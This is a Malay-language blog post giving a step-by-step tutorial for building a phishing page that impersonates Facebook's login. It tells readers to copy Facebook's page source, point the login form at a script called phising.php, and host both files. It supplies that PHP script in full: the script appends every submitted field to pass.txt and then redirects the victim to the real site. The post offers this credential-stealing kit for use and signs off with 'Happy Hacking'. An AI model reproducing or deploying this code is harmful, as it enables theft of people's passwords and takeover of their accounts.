Popular Posts

Membuat Laman Phishing Facebook

Salam bertemu kembali. Terus je ke cara membuat laman phishing ok.

1- Buka http://www.facebook.com.
2- Setelah halaman terbuka sepenuhnya anda tekal Ctrl + U di keyboard secara bersama. Kemudian akan muncul Source Code-nya.
3- Copy semua Source Code yang terdapat di web tersebut. Ctrl + A ( untuk highlight semua ) kemudian Crtl + C ( untuk copy / menyaslin Source Code tersebut ).
4- Setelah itu buka notepad.
5- Paste Source Code yang sudah di copy tadi.
6- Cari menggunakan Crtl + F, isi dengan “action=” ( tanpa tanda " )
cari sampai keluar ini
 
<form action="https://www.facebook.com/login.php?login_attempt=1" method="post">

7- Ganti "https://www.facebook.com/login.php?login_attempt=1" dengan phising.php dan post dengan GET
contoh : <form action="phising.php" method="GET">

8- Save as login.html
9- Buka notepad lagi dan copy code php ini ke notepad :

<?php

header("Location: https://www.facebook.com/");

$handle = fopen("pass.txt", "a");

foreach($_GET as $variable => $value) {

   fwrite($handle, $variable);

   fwrite($handle, "=");

   fwrite($handle, $value);

   fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>

10- Save dengan nama phising.php
11- Upload ke hosting anda.

Tutorial upload file di free hosting klik disini
Selamat berjaya. and lastly "Happy Hacking"


Hakcipta : Cyber-sharing.blogspot.com


0 comments:

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 

Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | GreenGeeks Review